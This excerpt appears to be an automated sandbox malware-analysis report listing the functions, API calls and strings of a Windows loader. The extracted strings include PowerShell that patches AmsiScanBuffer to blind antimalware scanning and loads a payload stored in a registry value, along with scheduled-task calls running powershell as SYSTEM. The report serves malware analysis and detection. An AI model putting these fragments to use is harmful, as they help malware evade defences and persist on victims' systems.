                                                                                                                                                          • Instruction Fuzzy Hash: 1651B0B22C27808AEB74AF29D14439877E8F355BA4F16611BDAD947BD5CB39C4E0CB01
                                                                                                                                                          Function 000001D643A680A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002D.00000003.2323889568.000001D643A60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D643A60000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_45_3_1d643a60000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 3c45b49fb714593c3b2f0f15bd1743fbffba0b8266d19eb21a809d2044773dbc
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: F951D4323D3A008AEB58EF2DE444BAC739DF344B98F159126DA9A47788DB78C8C1C701
                                                                                                                                                          Function 000001D643A69AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002D.00000003.2323889568.000001D643A60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D643A60000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_45_3_1d643a60000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: 0bc549c135c77d1bf49cfd518b783a8461a460bdae6cec86bd5d98798e4d066b
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: FC618B72549BC485EB71EF19E4407DAB7A4F785B88F04621AEBD807B9ACB78C1D4CB00

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:76.6%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:36.3%
                                                                                                                                                          Total number of Nodes:102
                                                                                                                                                          Total number of Limit Nodes:10
                                                                                                                                                          execution_graph 239 401798 242 4017a5 FindResourceA 239->242 243 40179d ExitProcess 242->243 244 4017c5 SizeofResource 242->244 244->243 245 4017d8 244->245 245->243 246 4017e4 LockResource RegOpenKeyExW 245->246 246->243 247 40180b RegSetValueExW 246->247 247->243 248 401822 247->248 260 401868 GetProcessHeap HeapAlloc StrCpyW 248->260 252 401835 253 401674 9 API calls 252->253 254 401841 253->254 307 40112f GetCurrentProcess IsWow64Process 254->307 258 401854 258->243 320 40151a SysAllocString SysAllocString CoInitializeEx 258->320 330 401159 260->330 262 401893 263 4018c5 StrCatW StrCatW 262->263 264 40189d StrCatW 262->264 333 4019e1 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 263->333 265 40112f 2 API calls 264->265 269 4018aa StrCatW StrCatW 265->269 269->263 272 401986 6 API calls 273 4018f0 272->273 274 401986 6 API calls 273->274 275 4018fc 274->275 276 401986 6 API calls 275->276 277 401908 276->277 278 401986 6 API calls 277->278 279 401914 278->279 280 401986 6 API calls 279->280 281 401920 280->281 282 401986 6 API calls 281->282 283 40192c 282->283 284 401986 6 API calls 283->284 285 401938 284->285 286 401986 6 API calls 285->286 287 401944 286->287 288 401986 6 API calls 287->288 289 401950 288->289 290 401986 6 API calls 289->290 291 40195c 290->291 292 401986 6 API calls 291->292 293 401968 292->293 294 401986 6 API calls 293->294 295 401974 294->295 296 401986 6 API calls 295->296 297 401827 296->297 298 401674 SysAllocString SysAllocString CoInitializeEx 297->298 299 401782 298->299 300 4016a7 CoInitializeSecurity 298->300 301 401785 SysFreeString SysFreeString 299->301 302 4016c8 CoCreateInstance 300->302 303 4016bd 300->303 301->252 304 40172d CoUninitialize 302->304 305 4016ea VariantInit 302->305 303->302 303->304 304->301 305->304 308 40114e 307->308 309 4011ad 7 API calls 308->309 310 4014f0 309->310 311 401209 CoInitializeSecurity 309->311 312 4014f3 6 API calls 310->312 313 40122a CoCreateInstance 311->313 314 40121f 311->314 312->258 315 401444 CoUninitialize 313->315 316 40124c VariantInit 313->316 314->313 314->315 315->312 318 40128f 316->318 318->315 319 4013dd VariantInit VariantInit VariantInit 318->319 319->315 321 40154d CoInitializeSecurity 320->321 322 40165f SysFreeString SysFreeString 320->322 323 401563 321->323 324 40156e CoCreateInstance 321->324 322->243 323->324 326 401659 CoUninitialize 323->326 325 401590 VariantInit 324->325 324->326 327 4015d3 325->327 326->322 328 401605 VariantInit 327->328 329 40162b 327->329 328->329 329->326 353 40118e GetModuleHandleA 330->353 332 401178 332->262 356 401000 CryptAcquireContextW 333->356 336 401a37 StrStrIW 338 401a9d 336->338 337 4018d8 346 401986 lstrlenW 337->346 339 401b71 6 API calls 338->339 340 401a57 StrStrIW StrNCatW StrCatW 338->340 342 401b27 StrCatW 338->342 343 401afb StrCatW StrNCatW 338->343 345 401adf StrCatW StrCatW 338->345 339->337 340->338 341 401b41 StrCatW StrStrIW 340->341 341->338 342->338 342->341 344 401b18 StrCatW 343->344 344->342 345->344 359 40104b 346->359 348 4019af 349 4019b3 StrStrIW 348->349 350 4018e4 348->350 349->350 351 4019bf 349->351 350->272 352 4019c0 StrStrIW 351->352 352->350 352->352 354 4011aa 353->354 355 40119d GetProcAddress 353->355 354->332 355->332 357 401044 356->357 358 401028 CryptGenRandom CryptReleaseContext 356->358 357->336 357->337 358->357 360 401000 3 API calls 359->360 361 401076 360->361 361->348 361->361

                                                                                                                                                          Callgraph

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 004019E1 Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 166memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00008000,775C2EB0,00000000,00402238), ref: 004019F4
                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00401A01
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00004000), ref: 00401A15
                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00401A1C
                                                                                                                                                            • Part of subcall function 00401000: CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
                                                                                                                                                            • Part of subcall function 00401000: CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
                                                                                                                                                            • Part of subcall function 00401000: CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
                                                                                                                                                          • StrStrIW.KERNELBASE(?,004037F8), ref: 00401A46
                                                                                                                                                          • StrStrIW.SHLWAPI(00000002,004037F8), ref: 00401A6D
                                                                                                                                                          • StrNCatW.SHLWAPI(00000000,?,?), ref: 00401A84
                                                                                                                                                          • StrCatW.SHLWAPI(00000000,004037FC), ref: 00401A90
                                                                                                                                                          • StrCatW.SHLWAPI(?,'+[Char](), ref: 00401AE8
                                                                                                                                                          • StrCatW.SHLWAPI(?,?), ref: 00401AF2
                                                                                                                                                          • StrCatW.SHLWAPI(?,'+'), ref: 00401B1C
                                                                                                                                                          • StrCatW.SHLWAPI(00000000,?), ref: 00401B2C
                                                                                                                                                          • StrCatW.SHLWAPI(00000000,004037FC), ref: 00401B47
                                                                                                                                                          • StrStrIW.SHLWAPI(?,004037F8), ref: 00401B61
                                                                                                                                                          • StrCatW.SHLWAPI(00000000,?), ref: 00401B75
                                                                                                                                                          • StrCpyW.SHLWAPI(?,00000000), ref: 00401B7C
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B8A
                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00401B93
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00401B99
                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 00401B9C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_56_2_400000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                                                                                                                          • String ID: '+'$'+[Char]($)+'
                                                                                                                                                          • API String ID: 3510167801-3465596256
                                                                                                                                                          • Opcode ID: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
                                                                                                                                                          • Instruction ID: 881abd296b23407031799d902d2f4cdc89e37ab1eeb299f195f03ae3526d8067
                                                                                                                                                          • Opcode Fuzzy Hash: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
                                                                                                                                                          • Instruction Fuzzy Hash: B051F1B1E00219ABCB14DFB4DD49AAE7BBDFB48301B14446AF605F7290DB78DA01DB64
                                                                                                                                                          Function 004011AD Relevance: 42.4, APIs: 20, Strings: 4, Instructions: 356memorycomCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 61 4011ad-401203 SysAllocString * 6 CoInitializeEx 62 4014f0 61->62 63 401209-40121d CoInitializeSecurity 61->63 64 4014f3-401519 SysFreeString * 6 62->64 65 40122a-401246 CoCreateInstance 63->65 66 40121f-401224 63->66 67 4014e5 65->67 68 40124c-401291 VariantInit 65->68 66->65 66->67 69 4014e8-4014ee CoUninitialize 67->69 71 4014d4 68->71 72 401297-4012ac 68->72 69->64 73 4014d7-4014e3 71->73 72->71 76 4012b2-4012c5 72->76 73->69 78 4014c6 76->78 79 4012cb-4012dd 76->79 80 4014c9-4014d2 78->80 82 4012e3-4012f0 79->82 83 4014b8 79->83 80->73 87 4012f6-401302 82->87 88 4014aa 82->88 85 4014bb-4014c4 83->85 85->80 87->88 93 401308-40131a 87->93 90 4014ad-4014b6 88->90 90->85 93->88 95 401320-401336 93->95 97 40149c 95->97 98 40133c-401352 95->98 99 40149f-4014a8 97->99 102 401358-40136a 98->102 103 40148e 98->103 99->90 106 401480 102->106 107 401370-401383 102->107 104 401491-40149a 103->104 104->99 109 401483-40148c 106->109 111 401472 107->111 112 401389-40139f 107->112 109->104 114 401475-40147e 111->114 117 401464 112->117 118 4013a5-4013b3 112->118 114->109 119 401467-401470 117->119 121 401456 118->121 122 4013b9-4013c7 118->122 119->114 124 401459-401462 121->124 122->121 126 4013cd-4013db 122->126 124->119 126->121 129 4013dd-401440 VariantInit * 3 126->129 130 401444-401446 129->130 130->124 131 401448-401454 130->131 131->124
                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
                                                                                                                                                          • SysAllocString.OLEAUT32(00402234), ref: 004011CC
                                                                                                                                                          • SysAllocString.OLEAUT32(powershell), ref: 004011D8
                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 004011E0
                                                                                                                                                          • SysAllocString.OLEAUT32(0040218C), ref: 004011EA
                                                                                                                                                          • SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
                                                                                                                                                          • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00401250
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 004013EA
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 004013F0
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00401400
                                                                                                                                                          • CoUninitialize.COMBASE ref: 004014E8
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004014FA
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 004014FD
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401502
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401507
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040150C
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401511
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_56_2_400000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                                          • String ID: $rbx-svc32$$rbx-svc64$SYSTEM$powershell
                                                                                                                                                          • API String ID: 3960698109-3701805373
                                                                                                                                                          • Opcode ID: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
                                                                                                                                                          • Instruction ID: 37100555a8a6d5ebab17ddb862eb0107d88f8e52c3f2eb0dc8ef098a6b7a2dd9
                                                                                                                                                          • Opcode Fuzzy Hash: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
                                                                                                                                                          • Instruction Fuzzy Hash: D5C1FC71E00119EFDB00DFA5C988DAEBBB9FF49354B1040A9E905FB2A0DB75AD06CB51
                                                                                                                                                          Function 004017A5 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 73registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 152 4017a5-4017bf FindResourceA 153 401862-401867 152->153 154 4017c5-4017d2 SizeofResource 152->154 155 401861 154->155 156 4017d8-4017e2 154->156 155->153 156->155 158 4017e4-401809 LockResource RegOpenKeyExW 156->158 158->155 159 40180b-401820 RegSetValueExW 158->159 159->155 160 401822-401858 call 401868 call 401674 * 2 call 40112f call 4011ad 159->160 160->155 171 40185a-40185c call 40151a 160->171 171->155
                                                                                                                                                          APIs
                                                                                                                                                          • FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
                                                                                                                                                          • LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
                                                                                                                                                          • RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
                                                                                                                                                            • Part of subcall function 00401868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
                                                                                                                                                            • Part of subcall function 00401868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
                                                                                                                                                            • Part of subcall function 00401868: StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
                                                                                                                                                            • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
                                                                                                                                                            • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
                                                                                                                                                            • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
                                                                                                                                                            • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
                                                                                                                                                            • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF
                                                                                                                                                            • Part of subcall function 00401674: SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
                                                                                                                                                            • Part of subcall function 00401674: SysAllocString.OLEAUT32(0040218C), ref: 00401690
                                                                                                                                                            • Part of subcall function 00401674: CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
                                                                                                                                                            • Part of subcall function 00401674: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
                                                                                                                                                            • Part of subcall function 00401674: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
                                                                                                                                                            • Part of subcall function 00401674: VariantInit.OLEAUT32(?), ref: 004016EE
                                                                                                                                                            • Part of subcall function 00401674: CoUninitialize.COMBASE ref: 0040177A
                                                                                                                                                            • Part of subcall function 00401674: SysFreeString.OLEAUT32(?), ref: 0040178C
                                                                                                                                                            • Part of subcall function 00401674: SysFreeString.OLEAUT32(00000000), ref: 0040178F
                                                                                                                                                            • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
                                                                                                                                                            • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
                                                                                                                                                            • Part of subcall function 004011AD: SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
                                                                                                                                                            • Part of subcall function 004011AD: SysAllocString.OLEAUT32(00402234), ref: 004011CC
                                                                                                                                                            • Part of subcall function 004011AD: SysAllocString.OLEAUT32(powershell), ref: 004011D8
                                                                                                                                                            • Part of subcall function 004011AD: SysAllocString.OLEAUT32(?), ref: 004011E0
                                                                                                                                                            • Part of subcall function 004011AD: SysAllocString.OLEAUT32(0040218C), ref: 004011EA
                                                                                                                                                            • Part of subcall function 004011AD: SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
                                                                                                                                                            • Part of subcall function 004011AD: CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
                                                                                                                                                            • Part of subcall function 004011AD: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
                                                                                                                                                            • Part of subcall function 004011AD: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
                                                                                                                                                            • Part of subcall function 004011AD: VariantInit.OLEAUT32(?), ref: 00401250
                                                                                                                                                            • Part of subcall function 0040151A: SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
                                                                                                                                                            • Part of subcall function 0040151A: SysAllocString.OLEAUT32(0040218C), ref: 00401538
                                                                                                                                                            • Part of subcall function 0040151A: CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
                                                                                                                                                            • Part of subcall function 0040151A: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
                                                                                                                                                            • Part of subcall function 0040151A: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
                                                                                                                                                            • Part of subcall function 0040151A: VariantInit.OLEAUT32(?), ref: 00401594
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_56_2_400000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
                                                                                                                                                          • String ID: $rbx-stager$$rbx-svc32$$rbx-svc64$@Lw$EXE$SOFTWARE
                                                                                                                                                          • API String ID: 2402434814-2477386209
                                                                                                                                                          • Opcode ID: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
                                                                                                                                                          • Instruction ID: 66d5473efb4f301b2503ca24c6ba2de9d178356673c05167290160cc1cb4c15a
                                                                                                                                                          • Opcode Fuzzy Hash: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
                                                                                                                                                          • Instruction Fuzzy Hash: 541191727003156BEB1527725E8DE6B299D9B85794B14443BBA05F62E2EEB8CD00C1A8
                                                                                                                                                          Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34encryptionCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 191 401000-401026 CryptAcquireContextW 192 401044-40104a 191->192 193 401028-401041 CryptGenRandom CryptReleaseContext 191->193 193->192
                                                                                                                                                          APIs
                                                                                                                                                          • CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
                                                                                                                                                          • CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
                                                                                                                                                          Strings
                                                                                                                                                          • Microsoft Base Cryptographic Provider v1.0, xrefs: 0040100E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_56_2_400000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                          • String ID: Microsoft Base Cryptographic Provider v1.0
                                                                                                                                                          • API String ID: 1815803762-291530887
                                                                                                                                                          • Opcode ID: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
                                                                                                                                                          • Instruction ID: b3acd7e835805075c9d1b27062e8bfe6e8ad1c0e86411dcbfca9405e651f33df
                                                                                                                                                          • Opcode Fuzzy Hash: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
                                                                                                                                                          • Instruction Fuzzy Hash: C9E0E5726002247BEB304B959E8DF8B3A6CDB80654F200036B704F2190D5B08D00D268
                                                                                                                                                          Function 00401868 Relevance: 47.3, APIs: 8, Strings: 19, Instructions: 86memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
                                                                                                                                                          • StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
                                                                                                                                                          • StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
                                                                                                                                                            • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
                                                                                                                                                            • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
                                                                                                                                                          • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
                                                                                                                                                          • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
                                                                                                                                                          • StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
                                                                                                                                                          • StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF
                                                                                                                                                          Strings
                                                                                                                                                          • LoadLibraryDelegate, xrefs: 00401920
                                                                                                                                                          • AmsiScanBufferPtr, xrefs: 00401968
                                                                                                                                                          • [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 004018BD
                                                                                                                                                          • Kernel32Ptr, xrefs: 00401938
                                                                                                                                                          • TypeBuilder, xrefs: 004018FC
                                                                                                                                                          • OldProtect, xrefs: 00401974
                                                                                                                                                          • GetProcAddress, xrefs: 00401914
                                                                                                                                                          • LoadLibraryPtr, xrefs: 00401944
                                                                                                                                                          • VirtualProtectPtr, xrefs: 00401950
                                                                                                                                                          • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 004018AE
                                                                                                                                                          • AmsiPtr, xrefs: 0040195C
                                                                                                                                                          • VirtualProtectDelegate, xrefs: 0040192C
                                                                                                                                                          • Get-Delegate, xrefs: 004018D8
                                                                                                                                                          • NativeMethods, xrefs: 00401908
                                                                                                                                                          • [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In, xrefs: 004018C5
                                                                                                                                                          • ReturnType, xrefs: 004018F0
                                                                                                                                                          • function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 0040189D
                                                                                                                                                          • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 004018B5
                                                                                                                                                          • ParameterTypes, xrefs: 004018E4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_56_2_400000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Heap$AllocCurrentWow64
                                                                                                                                                          • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                                                                                                                          • API String ID: 2666690646-646820343
                                                                                                                                                          • Opcode ID: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
                                                                                                                                                          • Instruction ID: f846a874a752e31dd56dc30a4e6b8ff2ba80a14d39c5350a1e27bccbc54df91f
                                                                                                                                                          • Opcode Fuzzy Hash: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
                                                                                                                                                          • Instruction Fuzzy Hash: 6D219D9030292067D5163A621A6A92F980E8BC1B46710C03FB9457F7E9DF7D8F038BDE
                                                                                                                                                          Function 0040151A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151memorycomCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
